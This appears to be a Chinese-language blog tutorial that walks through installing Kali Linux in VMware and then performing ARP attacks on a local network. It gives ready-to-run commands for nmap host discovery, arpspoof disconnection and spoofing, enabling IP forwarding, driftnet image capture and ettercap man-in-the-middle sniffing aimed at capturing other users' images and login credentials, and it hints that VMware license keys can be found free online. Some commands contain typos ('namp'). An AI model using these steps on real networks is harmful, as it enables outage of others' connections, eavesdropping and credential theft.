在我們翻開一本關於開發類的書籍的時候都會看到一句:“工欲善其事必先利其器”,這句話給我們的意思呢大概就是,要想學好編程,首先得有開發工具,接下來,我就來講怎么安裝Linux kali 系統的環境,這時候很多人會產生疑惑,不久是個系統嗎直接裝不就好了?為啥還要環境,由於kali系統是全root模式安全性為0,容易被病毒入侵,不利於測試,幾乎很少有人把它直接裝在自己的電腦硬盤上,所以這時候我們有需要一個虛擬機,(簡單說一下虛擬機的概念:虛擬機它就是可以模擬各種系統運行的一個軟件,通常都指-VMware)
虛擬機安裝教程
接下來就需要linux kali的鏡像文件進行安裝到虛擬機上就ok了
注意網絡模式要設為橋接!還有就是密匙網上都有!隨便搜一下就永久免費啦!下面附上kali系統的安裝教程。
kali系統安裝教程
當你在虛擬機中安裝好了kali系統的時候(如上圖所示),kali系統包含眾多腳本,可以幫助我們做很多測試,下面主要介紹Arp攻擊的原理及教程
ARP協議
ARP(Address Resolution Protocol,地址解析協議)是一個位於TCP/IP協議棧中的網絡層,負責將某個IP地址解析成對應的MAC地址。
基本功能
通過目標設備的IP地址,查詢目標設備的MAC地址,以保證通信的進行。
ARP攻擊的局限性
ARP攻擊僅能在以太網(局域網如:機房、內網、公司網絡等)進行。
無法對外網(互聯網、非本區域內的局域網)進行攻擊。
ARP攻擊的攻擊原理
ARP攻擊就是通過偽造IP地址和MAC地址實現ARP欺騙,能夠在網絡中產生大量的ARP通信量使網絡阻塞,攻擊者只要持續不斷的發出偽造的ARP響應包就能更改目標主機ARP緩存中的IP-MAC條目,造成網絡中斷或中間人攻擊。
在Kali Linux環境下的實現ARP攻擊
攻擊環境
攻擊主機:Kali Linux
IP:192.168.1.13
被攻擊主機:Windows 10
IP:192.168.1.10
因為是在虛擬機環境下實現的攻擊,所以要提前將虛擬機的網絡適配器設置為橋接模式,這樣一來虛擬機便可以單獨獲得一個ip地址,而不是和NAT模式下一樣和宿主機共用一個ip地址。
ARP斷網攻擊(更多攻擊手段持續更新ing)
在進行攻擊的時候我們需要先知道自己的IP地址,在終端中輸入ifconfig指令即可(所說的終端是kali系統中的cmd在左側任務欄內,一般是第二個)
在知道了自己IP地址的情況下,我們同時也知道了自己所在的網段,接下來我們可以找一下當前局域網下還存在哪些主機,
如果想看自己電腦連接的那台路由器上的網管輸入ipconfig查看
這里使用nmap腳本(nmap可以掃描出當前路由器下被占用的端口,通俗點講就是這些端口都是有人在使用的!)出於道德我演示攻擊自己的電腦為例子!
命令:namp -sP 192.168.1.*
后面的是網關ip,不是絕對的,網關地址在上圖中可以看到
可以看到我們已經通過namp命令掃描出了當前路由器下的ip
對比上下圖,我們可以發現我們的目標ip的確也是在列表中的,這個時候目標還是可以正常上網的
此時,在Kali中使用arpspoof工具實現ARP攻擊
攻擊命令:Arpspoof -i eth0 -t 192.168.1.10 -t 192.168.1.1
ip就是目標ip加上網關地址
這個時候的目標已經無法正常上網了
停止ARP攻擊,目標就能恢復到正常上網狀態
快捷鍵是(Ctrl+c)結束攻擊!
Arp欺騙
如果arp攻擊是斷網,那么arp欺騙就是對數據流量的截獲,其實原理很簡單,就是以kali系統為目標主機向路由器說我就是你要發送信號的主機,這樣kali在開啟ip地址轉發的情況下,上網所經的數據流量經過kali主機,kali就能對其進行圖片,賬號密碼的截獲,當然並不是能百分之百截獲到,只能獲取到一部分,但這樣已經會造成很大的安全問題!
cat /proc/sys/net/ipv4/ip_forward
//查看kali系統是否開啟了ip地址轉發(其中0表示沒有開起1表示開啟)
echo 1 >/proc/sys/net/ipv4/ip_forward
// 臨時修改kali系統開啟ip地址轉發(開啟IP地址轉發,目標主機依然可以上網,但網絡質量可能會很差)
//如何使kali系統永久開啟ip地址轉發?
輸入命令:vim /etc/sysctl.conf
找到對應的命令行,net ipv4.ip forward=1;將警號去掉即可永久生效,或者復制命令行在命令下,帶警號這樣就起到了注釋的作用
這時候kali系統就相當於一個路由器,可以實現ip地址的轉發
輸入命令
arpspoof -i eth0 -t 192.168.43.129 192.168.43.5
另外在開啟一個終端窗口
driftnet -i eth0
抓到本地:driftnet -i eth0 -d /home/****(路徑)
2.圖形化工具
ettercap -- help 查看參數
ettercap - G //進入圖形化管理界面,掃描端口下存活主機,將網關IP地址加到atark1目標主機添加到atark2選擇Mitm->ArP毒化
ettercap -i eth0 -Tq -M arp:remote //192.168.43.129// //192.168.43.144//
其中 tq是靜態文本,M為中間人攻擊,格式嚴謹
開啟攻擊---底部出現help,那么一般情況下就是啟動成功了
這時候再使用driftnet -i eth0
對圖片進行截獲,不知道為啥但是感覺圖形化工具比較好用,截獲圖片數量也比較多
3.獲取用戶登陸密碼及賬號
我做了靶機測試,發現並不是所有賬號密碼都可以截獲現在很多網站采用https傳輸協議,即使截到了也不一定是明文,通常是通過某些特殊算法進行加密
so,懂我意思吧!
步驟,開啟兩個終端,輸入命令
1.echo 1 >/proc/sys/net/ipv4/ip_forward(終端1)
2.arpspoof -i eth0 -t 192.168.43.129 192.168.43.5(終端1,前一個ip地址是目標ip,后一個主機地址是網關,這個語法通俗點講就是告訴路由器我是你要發送信息的目標)
3.ettercap -Tq -i eth0(終端2,開啟靜態文本監聽模式)
基本上輸入號這三個命令就完成了對目標主機賬號密碼的監聽,隨着時代進步,手工輸入密碼的形式漸漸被掃描二維碼登陸所代替。